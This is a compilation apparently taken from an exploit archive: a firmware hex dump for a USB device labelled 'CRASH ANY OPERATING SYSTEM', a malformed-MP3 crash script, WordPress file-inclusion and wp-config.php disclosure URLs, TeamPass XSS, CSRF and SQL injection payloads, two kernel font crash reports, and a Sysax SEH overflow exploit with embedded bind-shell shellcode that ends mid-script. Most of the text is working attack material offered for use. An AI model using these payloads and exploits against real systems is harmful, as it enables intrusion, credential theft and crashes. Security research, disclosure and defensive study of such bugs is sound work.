:1009C0000E948106E0917505F0917605EE0DFF1D00
:1009D000628573856C0D7D1D49E050E080E00E94CA
:1009E000DE030F900F900F900F9000E010E0E09169
:1009F0007505F0917605EE0DFF1D0284F385E02D5F
:100A0000EC0DFD1D818590E0081719075CF51F931B
:100A10000F939F928F920E948106E0917505F0914D
:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16
:100A3000C801880F991FA485B585A80FB91F4D91CE
:100A40005C910284F385E02DE80FF91F60817181CC
:100A500080E00E94DE030F5F1F4F0F900F900F90FA
:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0
:100A700097CF8FED94E09F938F930E9481060F9004
:100A80000F9058C0C8012A8B0E94D3032A892130B5
:100A9000C1F0233009F04EC08C851F928F9389EFEF
:100AA00094E09F938F930E94810642E050E062E8B9
:100AB00071E080E00E94DE030F900F900F900F9086
:100AC00035C04091000150E060E071E080E00E949C
:100AD000DE032CC0873071F1883021F481E08093EF
:100AE000F10024C0893011F5937021F5EDE4F1E0B7
:100AF00081E021E096E38093E9002093EB003491BC
:100B00003093EC009093ED008F5F3196843099F72D
:100B10008EE78093EA001092EA008C85809372053C
:100B200005C0888999890E94D30304C08EEF809301
:100B3000E80003C081E28093EB0062960FB6F89460
:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F
:100B5000AF919F918F917F916F915F914F913F9155
:100B60002F911F910F91FF90EF90DF90CF90BF904A
:100B7000AF909F908F907F906F900F900FBE0F90CF
:100B80001F9018951F920F920FB60F9211248F93FA
:100B90009F938091E1001092E10083FF0FC01092BB
:100BA000E90091E09093EB001092EC0092E39093B7
:100BB000ED001092720598E09093F00082FF1AC049
:100BC00080917E05882339F080917E058150809345
:100BD0007E05882369F080917D05882359F08091F6
:100BE0007D05815080937D05811104C0289A02C043
:100BF0005D9AF1CF9F918F910F900FBE0F901F9034
:100C00001895CF93DF93CDB7DEB782E1FE0135961D
:100C1000A0E0B1E001900D928A95E1F78F89988D5F
:100C20009093760580937505898D9A8D90937405C0
:100C3000809373058B8D9C8D90937C0580937B05B1
:100C40008D8D9E8D90937A05809379058F8D98A1D7
:100C500090937805809377051092720581E08093D8
:100C6000D70080EA8093D80082E189BD09B400FEF4
:100C7000FDCF61E070E080E090E00E94790280E9C1
:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040C007001500010102030109028D
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF
--
HireHackking 
#-*- coding: utf-8 -*-

#

# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS

# Date: 2016-03-12

# Author: INSECT.B

#   Facebook : https://www.facebook.com/B.INSECT00

#   GitHub : binsect00

#   Blog : http://binsect00.tistory.com

# Vendor Homepage : http://www.zortam.com

# Software Link: http://www.zortam.com/download.html

# Version: 20.15

# Tested on: Windows7 Professional SP1 En x86 

# CVE : N/A

#

# Detail..

#  1. Zortam Mp3 Media Studio is program that change tags sound file

#  2. If tag length over certain length, program is occured crash.  

#  3. Make mp3 file. title tag length is 3000.

#  4. program open. and serching Directory





id3Id = '\x49\x44\x33' #ID3

id3Version = '\x03\x00'

id3Flag = '\x00'

id3Size = '\x00\x00\x2F\x2D'

id3 = id3Id + id3Version + id3Flag + id3Size



frameId = '\x54\x49\x54\x32' #TIT2

frameSize = '\x00\x00\x0B\xB9' #Frame Size

frameFlag = '\x00\x00'

textEncoding = '\x00'

textInfo = 'A'*3000

frame = frameId + frameSize + frameFlag + textEncoding + textInfo





padding = '\x00'*1100



payload = id3 + frame + padding

with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f:

	f.write(payload)



'''

STATUS_STACK_BUFFER_OVERRUN encountered

(aa4.c08): Break instruction exception - code 80000003 (first chance)

eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640

eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0         nv up ei pl zr na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 

kernel32!FormatMessageA+0x14031:

7619e109 cc              int     3

0:000> !exchain

0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)

0012f2b8: 41414141

Invalid exception stack at 41414141

'''
HireHackking 
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
HireHackking 
Affected Product:    TeamPass
Vulnerability Type:  	Multiple XSS,CSRF, SQL injections
Fixed in Version:	2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
Vendor Website:      	http://www.teampass.net
Software Link: : 	https://github.com/nilsteampassnet/TeamPass
Affected Version:	2.1.24 and prior 
Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
Google Dork: intitle:"Teampass" + inurl:index.php?page=items
Tested on: Ubuntu
Remote Exploitable:  Yes
Reported to vendor:  30 december 2015
Disclosed to public: 14 March 2016
Release mode:        Responsible Disclosure
CVE-2015-7562 TeamPass 2.1.24 Persistant XSS 
CVE-2015-7563 TeamPass 2.1.24 CSRF 
CVE-2015-7564 TeamPass 2.1.24 SQL Injection 
Credits:              Vincent Malguy


Description :
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. 
Copyright (c) 2009-2015, Nils Laumaillé

********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS  *********************
When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficiently  prevent XSS.
POC of a persistant XSS : add  item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";
This xss will be trigger each time a user click on this item. 
As item can be share, there is a way for a user to trick an admin to trigger this xss.
fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

POC of a persistant XSS : 
Add a new role with name  : <script>alert("XSS");</script> 
This xss will be trigger in many admin pages
Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

********************* CVE-2015-7563 TeamPass 2.1.24 CSRF  *********************
Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :

<form action="http://<teampass host>/sources/main.queries.php" method="post">
    <select name="type">
    <option value="increase_session_time »>will add 1 hour timeout to the user session</option>
</select>
    <input type=submit>
  </form> 
  
recommanded fix: add anti-CSRF token.

********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections   *********************
SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.
Sqlmap output  :
---
Parameter: id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
 —
 fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)


SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .
Note that direction need to be prefixed by ", "  in order to be exploitable
Sqlmap output  for connections_logs:
---
Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
—

---
Parameter: direction (POST)
   Type: boolean-based blind
   Title: MySQL >= 5.0 boolean-based blind - Parameter replace
   Payload: type=errors_logs&order=date&direction=,  (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
—
fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=683

We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:

---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fb6f5000, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 99053e40, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


Could not read faulting driver name

WRITE_ADDRESS: GetPointerFromAddress: unable to read from 827ae84c
Unable to read MiSystemVaType memory at 8278d780
 fb6f5000 

FAULTING_IP: 
ATMFD+33e40
99053e40 890c82          mov     dword ptr [edx+eax*4],ecx

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  VERIFIER_ENABLED_VISTA_MINIDUMP

BUGCHECK_STR:  0xD6

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 99054677 to 99053e40

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
b603ecb0 99054677 fb472880 fb6f438c 00000f5c ATMFD+0x33e40
b603ece4 99054776 fb6f4380 00000003 fb6f438c ATMFD+0x34677
b603ed0c 99049fb3 fb472800 fc5b60b8 990663ec ATMFD+0x34776
b603ed30 9904eaf5 fc704c70 990663ec 00000f5c ATMFD+0x29fb3
b603f444 9904f85f fc704c70 9905f028 b603f690 ATMFD+0x2eaf5
b603f500 9904286e fc704c70 9905f028 b603f690 ATMFD+0x2f85f
b603f5ec 99042918 fc704c70 b603f690 b603f714 ATMFD+0x2286e
b603f618 990333d2 fc704c70 9905f028 b603f690 ATMFD+0x22918
b603f77c 990337a9 00000000 b603f89c fb6bcc80 ATMFD+0x133d2
b603f7d0 990240ff 00000000 b603f89c 00000000 ATMFD+0x137a9
b603f824 9918de12 ff7a5010 fb562cf0 00000001 ATMFD+0x40ff
b603f86c 9917687d ff7a5010 fb562cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
b603f8e0 991a1653 ffa6a130 fb588b54 0000004c win32k!xInsertMetricsRFONTOBJ+0x9c
b603f914 991a3735 00000020 b603f9fc b603fb8c win32k!RFONTOBJ::bGetGlyphMetrics+0x131
b603fbb8 991b6856 17010459 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
b603fc14 8267fa06 17010459 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
b603fc14 776771b4 17010459 00000040 00000040 nt!KiSystemServicePostCall
02dde7ac 00000000 00000000 00000000 00000000 0x776771b4
---

The crash always occurs while trying to write outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.

The issue reproduces on Windows 7 and 8.1; other platforms were not tested. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in ATMFD.DLL or another location in kernel space, as caused by the corrupted pool state.

Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39560.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=682

We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:

---
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: a6703535, Actual security check cookie from the stack
Arg2: 98ee9e09, Expected security check cookie
Arg3: 671161f6, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------


DEFAULT_BUCKET_ID:  VERIFIER_ENABLED_VISTA_MINIDUMP

SECURITY_COOKIE:  Expected 98ee9e09 found a6703535

CUSTOMER_CRASH_COUNT:  1

BUGCHECK_STR:  0xF7

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 98ea5720 to 82725b84

STACK_TEXT:  
a6723488 98ea5720 000000f7 a6703535 98ee9e09 nt!KeBugCheckEx+0x1e
WARNING: Stack unwind information not available. Following frames may be wrong.
a67234a8 98ec57f6 00000085 00400000 08680370 ATMFD+0x15720
a672353c 98ec5b0e 00400000 a6723790 00400000 ATMFD+0x357f6
a6723610 8297ef90 ff68a000 00000000 ff68a000 ATMFD+0x35b0e
a6723624 99180853 3e9ca839 a6723734 98ec5063 nt!VerifierExFreePoolWithTag+0x30
a6723638 00400000 a672364c a6723790 a6723868 win32k!VerifierEngFreeMem+0x5b
a6723790 98e95328 98e953b4 98e953be 98e95442 0x400000
a67237c8 00000000 00001f98 00000000 00000000 ATMFD+0x5328
---

While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.

The immediate reason of the bugcheck is a stack corruption detected by the stack cookie protection (/GS). The issue reproduces on Windows 7 and 8.1; other platforms were not tested. In our environment, it is sufficient to open the offending font in the default Windows Font Viewer to reproduce the crash, or even click on a folder icon containing the font in Windows Explorer.

Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip
HireHackking 
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost

download.php file code:

<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
	$file = $_GET['file'];

	header( 'Content-Type: application/zip' );
	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
	readfile( $file );
	unlink( $file );
	
	exit;
}
?>

Proof of concept:

Note that because of the unlink, we potentially can destroy the wordpress core.

Simply add the get parameter file:

localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php

Found by AMAR^SHG (Shkupi Hackers Group)
HireHackking 
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
#           03/14/16 Vender notified
#           03/17/16 Vender acknowledges issue and publishes patch (6.51)
#           03/21/16 Exploit Published
#
# Summary:  This is a post authentication exploit that requires the HTTP file sharing service to be running on
#           Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
#           service. Once exploited, the shellcode runs with SYSTEM privileges.  In this example, we attack folder_
#           in dltslctd_name1.htm.  The root path of the user shouldn't break the buffer offset in the stack, though
#           the user will need to have permission to delete folders.  If the user has file delete permissions, file_
#           will work as well.  mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
#           be modified to adapt to a users permissions.

import httplib

target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5'            #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm

#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"

shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")

arg="folder_"                       #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1"                #Can be changed, though padding will needed to be updated as well 
junk1="A"*26400                     #Initial pile of junk
noppad="\x90"*296                   #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell))    #Fill in after our shellcode till nseh    
nseh="\xeb\x06\x90\x90"             #Short jump over SEH
seh="\xd7\x2a\x92\x5d"              #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff"         #jump back 1000 bytes for plenty of room for your shellcode
